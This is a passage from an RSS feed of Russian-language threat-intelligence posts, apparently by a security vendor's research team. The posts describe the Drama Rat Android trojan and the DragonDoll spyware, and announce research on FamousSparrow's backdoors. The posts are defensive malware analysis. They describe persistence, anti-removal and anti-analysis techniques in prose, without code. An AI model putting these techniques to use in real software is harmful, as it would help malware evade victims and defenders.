<p>После установки троян отправляет на С2-сервер информацию об устройстве: версию Android, присвоенный ему идентификатор, уровень заряда аккумулятора, тип сетевого подключения, изображение обоев рабочего стола, данные о SIM-картах, предоставленных разрешениях и другую информацию.</p>
<figure class="wp-block-image"><img width="1024" height="974" src="/wp-content/uploads/2026/09/photo_610@04-09-2026_14-44-48-1024x974.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_610@04-09-2026_14-44-48-1024x974.jpg 1024w, /wp-content/uploads/2026/09/photo_610@04-09-2026_14-44-48-300x285.jpg 300w, /wp-content/uploads/2026/09/photo_610@04-09-2026_14-44-48-768x731.jpg 768w, /wp-content/uploads/2026/09/photo_610@04-09-2026_14-44-48.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Отправляемые на С2-сервер данные устройства, собранные до выдачи разрешений</figcaption></figure>
<p>Возможности Drama Rat значительно превосходят функциональность обычных банковских троянов.</p>
<p>Помимо функций, которые позволяет реализовать служба «Специальных возможностей» (клики по экрану, доступ к содержимому экрана и буфера обмена), приложение способно записывать экран и видео с камеры устройства, скрывая индикатор работающей камеры 🟢</p>
<p>Кроме того, приложение может читать поступающие уведомления и использовать зараженное устройство для проведения DDoS-атак на выбранные злоумышленниками интернет-ресурсы.</p>
<figure class="wp-block-image"><img width="1024" height="754" src="/wp-content/uploads/2026/09/photo_611@04-09-2026_14-44-48-1024x754.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_611@04-09-2026_14-44-48-1024x754.jpg 1024w, /wp-content/uploads/2026/09/photo_611@04-09-2026_14-44-48-300x221.jpg 300w, /wp-content/uploads/2026/09/photo_611@04-09-2026_14-44-48-768x566.jpg 768w, /wp-content/uploads/2026/09/photo_611@04-09-2026_14-44-48.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Пример функции handDds</figcaption></figure>
<p>Дроппер и полезная нагрузка сильно обфусцированы: строки расшифровываются только во время выполнения. От динамического анализа приложение защищает ряд механизмов, включая обнаружение root-доступа, поиск следов Frida, выявление отладчиков, проверку на запуск в эмуляторе и другие.</p>
<p>При этом Drama Rat всеми силами защищается от удаления и отзыва разрешений: как только открываются настройки устройства, троян возвращает пользователя на главный экран.</p>
<figure class="wp-block-video"><video controls preload="metadata" src="/wp-content/uploads/2026/09/DEM.mp4"></video></figure>
<p>В коде трояна реализован механизм закрепления в системе с использованием системного сервиса AlarmManager. При остановке или сбое отдельных активностей он перезапускает неактивные компоненты, обеспечивая стабильную работу вредоносного приложения.</p>
<figure class="wp-block-image"><img width="1024" height="593" src="/wp-content/uploads/2026/09/photo_612@04-09-2026_14-44-48-1024x593.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_612@04-09-2026_14-44-48-1024x593.jpg 1024w, /wp-content/uploads/2026/09/photo_612@04-09-2026_14-44-48-300x174.jpg 300w, /wp-content/uploads/2026/09/photo_612@04-09-2026_14-44-48-768x445.jpg 768w, /wp-content/uploads/2026/09/photo_612@04-09-2026_14-44-48.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Фрагмент функции закрепления в системе</figcaption></figure>
<p>Перезагрузка устройства также не позволит остановить функционирование вредоносной программы: обнаружено использование фильтров <code>BOOT_COMPLETED</code>/<code>QUICKBOOT_POWERON</code>/<code>REBOOT</code>, которые позволяют приложению получать сигнал от ОС на старте системы и заново запускать все свои компоненты.</p>
<p>🐭 Drama Rat — это не просто банковский троян, а инструмент для захвата полного контроля над устройством: он автоматически выдает себе разрешения, скрывается в системе, противодействует удалению и поддерживает независимые каналы связи с сервером.</p>
<p>Приложение затрудняет анализ и старается максимально скрыть вредоносную функциональность.</p>
<p>Больше технических подробностей и рекомендации читайте <a href="https://habr.com/ru/companies/pt/articles/1077814/" rel="noopener" target="_blank"><strong>в нашем блоге на Хабре</strong></a> 😮</p>
<p><span class="hashtag">#ir</span> <span class="hashtag">#malware</span> <span class="hashtag">#android</span></p>
<p><a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Минус один пернатый вор — плюс сто очков рейтинга!</title>
		<link>/one-less-feathered-thief-plus-one-hundred-rating-points/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Fri, 21 Aug 2026 16:46:21 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">/%d0%bc%d0%b8%d0%bd%d1%83%d1%81-%d0%be%d0%b4%d0%b8%d0%bd-%d0%bf%d0%b5%d1%80%d0%bd%d0%b0%d1%82%d1%8b%d0%b9-%d0%b2%d0%be%d1%80-%d0%bf%d0%bb%d1%8e%d1%81-%d1%81%d1%82%d0%be-%d0%be%d1%87%d0%ba/</guid>

					<description><![CDATA[Минус один пернатый вор — плюс сто очков рейтинга! 😵 Команда Threat Intelligence экспертного центра безопасности Positive Technologies обнаружила кампанию восточноазиатской группировки FamousSparrow. Группировка использовала новый бэкдор, который мы назвали SquawkDoor, а…]]></description>
										<content:encoded><![CDATA[<p><strong>Минус один пернатый вор — плюс сто очков рейтинга!</strong> 😵</p>
<p>Команда Threat Intelligence экспертного центра безопасности Positive Technologies обнаружила кампанию восточноазиатской группировки FamousSparrow. Группировка использовала новый бэкдор, который мы назвали SquawkDoor, а также новую версию известного бэкдора SparrowDoor 🏴‍☠️</p>
<p>Группировка встраивала вредоносные JS-скрипты на сайты из разных стран. Они показывали пользователю якобы ошибку сертификата на определенном языке и предлагали скачать новый сертификат, который являлся MSI-файлом и приводил к заражению вредоносным бэкдором.</p>
<p>😳 <strong>Мы проанализировали бэкдоры</strong>: подробно показали новый SquawkDoor и провели детальный анализ отличий нового SparrowDoor от старой версии, а также связанных с ними HemiGate, TernDoor и CrowDoor. </p>
<p>Помимо этого, мы нашли различные пересечения с другими злоумышленниками из Восточной Азии. Также в процессе анализа мы обнаружили связанного с группой пентестера, который готовил атаки. </p>
<p>О том, какие приложения ранее взламывал злоумышленник и какие у него фетиши — <a href="https://ptsecurity.com/research/pt-esc-threat-intelligence/famoussparrow-attacks-with-updated-sparrowdoor-backdoor-and-new-squawkdoor-backdoor?/utm_source=tg_esc&#038;utm_medium=sparrow&#038;utm_campaign=21_08" rel="noopener" target="_blank">читайте в нашем блоге</a> 😏</p>
<p><span class="hashtag">#TI</span> <span class="hashtag">#APT</span> <span class="hashtag">#Malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>DragonDoll: матрешка в мире Android-шпионов</title>
		<link>/dragondoll-a-matryoshka-in-the-world-of-android-spies/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Mon, 17 Aug 2026 12:01:15 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">/dragondoll-%d0%bc%d0%b0%d1%82%d1%80%d0%b5%d1%88%d0%ba%d0%b0-%d0%b2-%d0%bc%d0%b8%d1%80%d0%b5-android-%d1%88%d0%bf%d0%b8%d0%be%d0%bd%d0%be%d0%b2/</guid>

					<description><![CDATA[DragonDoll: матрешка в мире Android-шпионов 🪆 В начале этой весны специалисты PT ESC обнаружили неизвестный ранее APK-файл, загруженный из Саудовской Аравии. Сам образец содержал много приемов Defense Evasion. Для усложнения анализа было…]]></description>
										<content:encoded><![CDATA[<p><strong>DragonDoll: матрешка в мире Android-шпионов</strong> 🪆</p>
<p>В начале этой весны специалисты PT ESC обнаружили неизвестный ранее APK-файл, загруженный из Саудовской Аравии. Сам образец содержал много приемов Defense Evasion.</p>
<p><strong>Для усложнения анализа было использовано:</strong></p>
<p><strong>•</strong> 1 техника BadPack<br />
<strong>•</strong> 2 этапа загрузки нативных библиотек<br />
<strong>• </strong>1 обфускация на основе LLVM<br />
<strong>•</strong> 6 проверок на выполнение в виртуальной среде<br />
<strong>•</strong> и несчитанное количество MBA-выражений</p>
<p>После долгих <s>страданий</s> этапов анализа, с помощью сил эмуляции, законов булевой алгебры и нескольких сотен строк кода наши специалисты распаковали новый Android-шпион DragonDoll 📱</p>
<p>В ходе исследования мы наткнулись на масштабную атаку с участием данного ВПО, направленную на пользователей Android из более чем 26 стран, включая и Россию.</p>
<p>Злоумышленники использовали GitHub как источник распространения и постоянного обновления DragonDoll. Ссылка на этот репозиторий привела на сеть поддельных сайтов с «обновлением» Chrome, содержание которых адаптировалось под язык жертвы.</p>
<p>Разбор того, что лежало под слоем обфускации — <a href="https://ptsecurity.com/research/pt-esc-threat-intelligence/dragondoll-what-s-behind-the-google-chrome-update/?utm_source=tg_esc&#038;utm_medium=dragondoll&#038;utm_campaign=17_08" rel="noopener" target="_blank">в нашем блоге</a> ⬅️</p>
<p><span class="hashtag">#TI</span> <span class="hashtag">#Android</span> <span class="hashtag">#Malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
